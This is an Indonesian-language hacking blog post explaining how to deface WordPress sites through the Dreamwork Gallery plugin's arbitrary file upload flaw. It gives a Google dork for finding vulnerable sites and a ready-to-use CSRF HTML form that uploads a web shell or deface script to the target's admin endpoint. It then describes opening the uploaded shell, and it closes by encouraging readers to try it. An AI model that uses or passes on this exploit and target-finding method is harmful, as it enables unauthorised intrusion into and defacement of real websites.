<center><b>cara deface dengan wp arbitrary dream work gallery file upload</b></center> - cowok tersakiti team

Latest

TUTORIAL,HACKING,DEFACE,BLOGGER,ANALIST,ARTICLES,NEWS

BANNER 728X90

Wednesday, February 22, 2017

cara deface dengan wp arbitrary dream work gallery file upload

cms wordpress adalah cms open sourche yang memberikan banyak kemudahan buat penggunanya.
namun siapa sangka? di balik kemudahan itu jga ter dapat banyak bug yang yg dapat membuat
para hacker dengan mudah menyusup ke dalamnya.
salah satunya di antaranya adalah seperti yang mau saya jelaskan ini.!
wp dreamwork gallery memang tidak asing lagi kedengarannya di telinga para peretas.
namun sampai sekarang masih banyak kita temui web yg vuln yang belum di tutup oleh adminnya.!

langsung aja saya akan jelaskan cara mudah deface dengan poc wp arbitrary dremwork gallery file upload

1. yang perlu kita butuhkan pertama kali adalah shell backdor.
atau bisa juga menggunakan script deface.
di sini saya anggap kalian udah punya script atau shell sendiri.!

2. selanjutnya yang kita butuhkan adalah google dork.
kalian bisa kembangin sendiri dorknya biar dpt bnyak vulnnya.
di sini saya pake dork inurl:wp-content/plugins/wp-dreamworkgallery

3. cari targetnya pake google dork di atas.
kalau keluar text xml seperti di bawah ini kemungkinan besar target vuln dan
bisa di deface.



4. selanjutnya buka notepad. copy dan pastekan csrf di bawah ini di notepad.
lalu copy dan pastekan url web target
ke dalam csrf yg udah di edit ke notepad tadi.
<html>
<body>
<form action="http://[path to WordPress]/
wp-admin/admin.php?page=dreamwork_manage"
method="POST" enctype="multipart/form-data"> <input type="hidden" name="task"
value="drm_add_new_album" /> <input type="hidden" name="album_name"
value="Arbitrary File Upload" /> <input type="hidden" name="album_desc"
value="Arbitrary File Upload" /> <input type="file" name="album_img"
value="" /> <input type="submit" value="Submit" /> </form> </body> </html>


5. selanjutnya simpan csrf dengan exstensi html.
dan buka file menggunakan browser.

6. terakhir upload shel/script deface yang sudah di persiapkan tadi,
kalau berhasil nanti akan muncul link tempat shell yg berhasil di upload tadi berada.
selanjutnya tinggal copy link yang muncul dan letakan di belakan url web target kita.

dan taraaaaa..,

shell telah berhasil di akses,..,
selamat mencoba dan jangan takut gagal,..

No comments:

Post a Comment